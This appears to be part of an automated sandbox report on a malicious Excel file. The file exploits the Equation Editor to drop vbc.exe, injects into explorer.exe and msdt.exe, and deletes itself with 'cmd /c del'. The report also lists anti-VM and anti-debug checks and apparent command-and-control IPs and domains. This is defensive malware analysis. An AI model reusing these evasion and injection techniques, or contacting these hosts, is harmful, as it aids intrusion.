          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_026D63BF
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_02633040
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_0264905A
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_0265D005
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_0262E0C6
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_026D2622
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_0267A634
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_0263E6C1
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_02634680
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_026657C3
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_0263C7BC
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_026B579A
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_0266D47D
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_026B443E
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_02665485
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_02641489
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_02676540
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_0263351F
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_0264C5F0
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_026E3A83
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_02657B00
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_026BDBDA
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_0262FBD7
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_026DCBA4
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_0265286D
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_0263C85C
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_026CF8EE
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_026B394B
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_026B5955
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_026469FE
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_026329B2
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_026D098E
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_0264EE4C
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_02662E2F
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_0265DF7C
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_02640F3F
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_026A2FDC
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_026CCFB1
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_0263CD5B
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_02660D3B
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_026CFDDD
          Source: C:\Users\Public\vbc.exe | Code function: String function: 007AF970 appears 49 times
          Source: C:\Users\Public\vbc.exe | Code function: String function: 00783F92 appears 79 times
          Source: C:\Users\Public\vbc.exe | Code function: String function: 0078373B appears 143 times
          Source: C:\Users\Public\vbc.exe | Code function: String function: 0073DF5C appears 78 times
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: String function: 0269F970 appears 78 times
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: String function: 0262E2A8 appears 38 times
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: String function: 0262DF5C appears 117 times
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: String function: 0267373B appears 244 times
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: String function: 02673F92 appears 116 times
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_004185F0 NtCreateFile,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_004186A0 NtReadFile,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_00418720 NtClose,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_004187D0 NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_004185EA NtCreateFile,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_00730078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_00730048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_007300C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_007307AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0072F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0072F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0072FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0072FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0072FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0072FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0072FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0072FC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0072FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0072FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0072FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0072FEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0072FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_00730060 NtQuerySection,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_007310D0 NtOpenProcessToken,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_00731148 NtOpenThread,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0073010C NtOpenDirectoryObject,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_007301D4 NtSetValueKey,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0072F8CC NtWaitForSingleObject,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_00731930 NtSetContextThread,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0072F938 NtWriteFile,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_026200C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_026207AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_0261FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_0261FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_0261FAB8 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_0261FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_0261FB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_0261FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_0261F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_0261F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_0261FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_0261FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_0261FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_0261FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_0261FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_02620060 NtQuerySection,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_02620078 NtResumeThread,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_02620048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_026210D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_02621148 NtOpenThread,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_0262010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_026201D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_0261FA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_0261FA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_0261FBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_0261F8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_02621930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_0261F938 NtWriteFile,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_0261FE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_0261FEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_0261FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_0261FFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_02620C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_0261FC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_0261FC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_0261FC90 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_0261FD5C NtEnumerateKey,
          Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\nsjBE61.tmp\npsx.dll 4D2A5F508E4D6A54D71AF82FCEA978527CDD216423FB050457DFEB4DB581178F
          Source: C:\Users\Public\vbc.exe | Memory allocated: 76F90000 page execute and read and write
          Source: C:\Users\Public\vbc.exe | Memory allocated: 76E90000 page execute and read and write
          Source: C:\Users\Public\vbc.exe | Memory allocated: 76F90000 page execute and read and write
          Source: C:\Users\Public\vbc.exe | Memory allocated: 76E90000 page execute and read and write
          Source: C:\Windows\SysWOW64\msdt.exe | Memory allocated: 76F90000 page execute and read and write
          Source: C:\Windows\SysWOW64\msdt.exe | Memory allocated: 76E90000 page execute and read and write
          Source: C:\Users\Public\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
          Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
          Source: C:\Users\Public\vbc.exe | Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
          Source: C:\Windows\SysWOW64\msdt.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
          Source: C:\Users\Public\vbc.exe | Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
          Source: C:\Windows\SysWOW64\msdt.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"
          Source: C:\Users\Public\vbc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\~$W6902.xlsx
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRD93E.tmp
          Source: classification engine | Classification label: mal100.troj.expl.evad.winXLSX@9/24@6/5
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_00402012 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_00404275 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: explorer.exe, 00000006.00000000.469132648.0000000002AE0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: .VBPud<_
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: Window Recorder | Window detected: More than 3 window changes detected
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000005.00000003.462720602.0000000000430000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.504101247.0000000000720000.00000040.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.504998016.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000003.464331880.0000000000590000.00000004.00000800.00020000.00000000.sdmp, msdt.exe, msdt.exe, 00000007.00000002.669422875.0000000002610000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 00000007.00000003.503886261.0000000002240000.00000004.00000800.00020000.00000000.sdmp, msdt.exe, 00000007.00000002.669567128.0000000002790000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 00000007.00000003.504934771.0000000002480000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: msdt.pdb source: vbc.exe, 00000005.00000002.505482723.0000000002580000.00000040.10000000.00040000.00000000.sdmp, vbc.exe, 00000005.00000003.502497513.0000000002480000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000003.501834417.0000000002380000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041B832 push eax; ret
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041B83B push eax; ret
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_004160CB push edx; ret
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041B8D6 push ebp; ret
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041B8F3 push ebp; ret
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041B89C push eax; ret
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041C134 push ebp; ret
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_00407265 push cs; iretd
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_004152C7 push edx; retf
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041537D push ebp; retf
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041C5DD push ebp; ret
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_00415F76 push ds; iretd
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_0041B7E5 push eax; ret
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_00408783 push ecx; iretd
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_0262DFA1 push ecx; ret
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\gntek[1].exe
          Source: C:\Users\Public\vbc.exe | File created: C:\Users\user\AppData\Local\Temp\nsjBE61.tmp\npsx.dll
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe

          Boot Survival

          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msdt.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Users\Public\vbc.exe | Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
          Source: C:\Users\Public\vbc.exe | RDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exe | RDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exe | RDTSC instruction interceptor: First address: 0000000000088614 second address: 000000000008861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exe | RDTSC instruction interceptor: First address: 00000000000889AE second address: 00000000000889B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2088 | Thread sleep time: -300000s >= -30000s
          Source: C:\Windows\explorer.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\msdt.exe | Last function: Thread delayed
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_004088E0 rdtsc
          Source: C:\Users\Public\vbc.exe | Process information queried: ProcessInformation
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_00405D7C FindFirstFileA,FindClose,
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_00402630 FindFirstFileA,
          Source: C:\Users\Public\vbc.exe | API call chain: ExitProcess graph end node
          Source: C:\Users\Public\vbc.exe | API call chain: ExitProcess graph end node
          Source: explorer.exe, 00000006.00000000.535157301.0000000000255000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.538166262.000000000457A000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 00000006.00000000.538166262.000000000457A000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: vbc.exe, 00000004.00000002.463398411.00000000005C4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
          Source: explorer.exe, 00000006.00000000.484429765.0000000003D90000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0e Mi3
          Source: explorer.exe, 00000006.00000000.535212313.000000000029B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
          Source: explorer.exe, 00000006.00000000.484429765.0000000003D90000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&00000023}\
          Source: explorer.exe, 00000006.00000000.538350640.00000000045D6000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_004088E0 rdtsc
          Source: C:\Users\Public\vbc.exe | Process token adjusted: Debug
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_00460402 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_00460744 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_00460706 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_00460616 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_004606C7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_007426F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 7_2_026326F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\msdt.exe | Process queried: DebugPort
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_00409B50 LdrLoadDll,

          HIPS / PFW / Operating System Protection Evasion

          barindex
Source: C:\Windows\explorer.exe | Network Connect: 37.123.118.150 80
Source: C:\Windows\explorer.exe | Domain query: www.mollyagee.com
Source: C:\Windows\explorer.exe | Domain query: www.youngliving1.com
Source: C:\Windows\explorer.exe | Network Connect: 1.32.255.137 80
Source: C:\Windows\explorer.exe | Domain query: www.zoharfine.com
Source: C:\Windows\explorer.exe | Domain query: www.teentykarm.quest
Source: C:\Windows\explorer.exe | Network Connect: 172.217.168.19 80
Source: C:\Windows\explorer.exe | Network Connect: 194.5.156.29 80
Source: C:\Windows\explorer.exe | Domain query: www.927291.com
Source: C:\Users\Public\vbc.exe | Section unmapped: C:\Windows\SysWOW64\msdt.exe base address: A40000
Source: C:\Users\Public\vbc.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\Public\vbc.exe | Section loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
Source: C:\Users\Public\vbc.exe | Section loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\msdt.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\msdt.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\Public\vbc.exe | Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
Source: C:\Users\Public\vbc.exe | Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Users\Public\vbc.exe | Thread register set: target process: 1764
Source: C:\Windows\SysWOW64\msdt.exe | Thread register set: target process: 1764
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe | Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Windows\SysWOW64\msdt.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"
Source: explorer.exe, 00000006.00000000.482466146.0000000000750000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.535363042.0000000000750000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.466394211.0000000000750000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.489035937.0000000000750000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.488752252.0000000000255000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.466126402.0000000000255000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.535157301.0000000000255000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ProgmanG
Source: explorer.exe, 00000006.00000000.482466146.0000000000750000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.535363042.0000000000750000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.466394211.0000000000750000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.489035937.0000000000750000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: !Progman
